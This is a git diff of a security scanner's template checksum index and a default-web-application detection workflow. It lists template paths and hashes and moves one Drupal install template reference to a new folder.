network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15
network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005
network/misconfig/tidb-native-password.yaml:140577255bfbe46ab1c88e594405a34b889a56f8
network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845
network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd
network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740
network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37
@ -8170,7 +8180,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:f6eaac90af8e77b23be2e3482cf5afbd3b015566
templates-checksum.txt:608bfc81bcb7af107a327b22977799f2016e33a5
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
@ -8209,7 +8219,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b
workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc
workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a
workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d
workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb
workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a
workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139
workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5
workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779


@ -4,6 +4,7 @@ info:
name: Default Web Application Detection
author: andydoering
description: Detects default installations of web applications
workflows:
- template: http/technologies/apache/default-apache-test-all.yaml
@ -23,7 +24,7 @@ workflows:
- template: http/technologies/default-django-page.yaml
- template: http/exposures/files/drupal-install.yaml
- template: http/misconfiguration/installer/drupal-install.yaml
- template: http/technologies/oracle/default-oracle-application-page.yaml